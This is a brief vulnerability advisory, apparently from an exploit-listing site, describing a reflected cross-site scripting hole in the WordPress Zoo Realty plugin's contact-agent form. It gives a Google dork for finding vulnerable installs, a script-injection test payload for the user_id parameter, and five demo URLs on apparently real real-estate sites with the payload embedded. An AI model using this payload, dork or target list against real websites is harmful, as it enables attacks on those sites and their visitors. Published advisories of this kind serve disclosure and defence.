Wordpress Zoo Realty Plugin Cross site scripting Vulnerability

2013.10.07
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php

############################# # Exploit Title : Wordpress Zoo Realty Plugin Cross site scripting Vulnerability # # Author : Ashiyane Digital Security Team # # Date: 2013/10/05 # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl:wp-content/plugins/Realty/display/elements/form_contact_agent.php # ############## # Location : site//wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=[xss]&popup=1 # # metod : Get # # Script for Test : "/><script>alert(1);</script> ############## # Demo: # # http://www.absXde.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.aXm.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.homeXnds.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.newsXciesforsale.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # # http://www.planXoperties.com.au/wp-content/plugins/Realty/display/elements/form_contact_agent.php?user_id=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&popup=1 # ########################### # # Discovered By : ACC3SS # ###########################


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top